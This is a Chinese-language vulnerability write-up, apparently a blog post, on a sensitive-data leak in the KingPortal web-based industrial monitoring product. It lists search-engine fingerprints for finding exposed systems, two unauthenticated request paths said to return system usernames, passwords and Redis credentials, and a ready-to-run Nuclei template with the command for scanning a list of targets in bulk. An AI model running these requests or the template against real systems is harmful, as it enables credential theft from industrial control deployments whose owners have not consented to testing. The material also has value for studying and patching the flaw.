0x01 漏洞介绍
北京亚控科技发展有限公司自主研发的KingPortal是一款纯B/S架构面向工业监控领域的web端组态产品,是大数据可视化与工业互联网技术融合的产物,KingPortal以自动化技术为起点,以信息集成为突破口,以组件为基础进行Web端可视化组态开发,远超传统CS组态软件和其他Web端产品。KingPortal具备高质量Web界面、瘦客户端、跨平台兼容、免安装、低代码等核心技术优势。
KingPortal开发系统存在敏感信息泄露漏洞,攻击者可以通过漏洞访问接口获取系统账号密码、Redis地址及密码等敏感信息,从而影响系统正常运行。
0x02 搜索语法
Fofa:
body="/public/javascripts/Common/Util/km_util.js"
Hunter
body="/public/javascripts/Common/Util/km_util.js"
Quake
body="/public/javascripts/Common/Util/km_util.js"
0x03 漏洞复现
请求接口获取项目信息。
/ProjectManager.json
请求接口获取Redis地址及密码、系统用户名及密码
/config/externalConfig.json
0x04 nuclei POC
Nuclei 批量检测POC
所用方法nuclei.exe -l 网址文件.txt -t POC.yaml
id: KingPortal_Information_leakage
info:
name: KingPortal_Information_leakage
author: xiaoming
severity: high
description: KingPortal Development System Information leakage
metadata:
max-request: 1
shodan-query: ""
verified: true
http:
- raw:
- |+
@timeout: 30s
GET /config/externalConfig.json HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
max-redirects: 3
matchers-condition: and
matchers:
- type: word
part: body
words:
- defaultUser
condition: and
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容